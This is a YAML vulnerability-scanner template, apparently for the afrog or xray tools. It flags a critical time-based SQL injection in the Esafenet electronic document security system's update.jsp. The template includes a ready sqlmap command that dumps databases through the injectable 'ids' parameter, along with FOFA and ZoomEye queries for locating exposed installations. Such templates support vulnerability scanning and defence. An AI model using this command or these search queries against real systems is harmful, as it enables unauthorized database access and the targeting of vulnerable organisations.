id: potential-esafenet-update-sqli

info:
  name: "亿赛通文档安全管理系统 update.jsp sql 时间注入 [需人工验证] "
  author: zan8in
  severity: critical
  verified: true
  potential: true
  description: |-
    亿赛通电子文档安全管理系统update.jsp存在延迟注入。
    【验证方法】python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3)" --batch --dbs
    FOFA: title="电子文档安全管理系统" && product="亿赛通-电子文档安全管理系统"
    ZoomEye: app:"亿赛通电子文档安全管理系统"
  reference:
    - https://mp.weixin.qq.com/s/ClWs4d3l_2ZsNvCJFiY9gg
  tags: esafenet,sqli,potentials
  created: 2023/10/18

rules:
  r0:
    request:
      method: GET
      path: "/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3)"
    expression: response.body.bcontains(b'激活成功！激活人数为') && response.body.bcontains(b'当前同步域用户共计')
expression: r0()
  